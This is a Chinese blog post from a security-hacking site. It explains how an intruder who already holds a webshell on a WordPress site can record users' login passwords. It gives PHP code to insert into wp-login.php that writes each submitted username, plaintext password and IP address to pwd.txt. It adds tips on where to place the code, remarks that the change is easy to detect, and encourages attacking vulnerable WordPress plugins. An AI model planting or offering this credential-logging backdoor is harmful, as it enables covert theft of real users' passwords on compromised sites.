webshell下记录WordPress登陆密码

分类:安全 | 2011-11-8 | 撸过 95 次
2人扯谈

webshell下记录Wordpress登陆密码方便进一步社工
原处:http://81sec.com/read.php?115
Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。
在文件wp-login.php中539行处添加:

 

 

// log password
$log_user=$_POST[‘log’];
$log_pwd=$_POST[‘pwd’];
$log_ip=$_SERVER[“REMOTE_ADDR”];
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
$txt=$txt.”\r\n”;
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
}

 

当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。

就是搜索case ‘login’
在它下面直接插入即可,记录的密码生成在pwd.txt中,
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录。

个人观点:

现在wordpress的插件漏洞很多,什么xss,注入,所以wordpress还是很有搞头的…

本站内容均为原创,转载请务必保留署名与链接!
webshell下记录WordPress登陆密码:https://www.webshell.cc/2032.html
标签:

相关日志

  1. 记得以前在土司曾经问过这个问题 有个好心人解答了 up主能帮忙找下那个吗?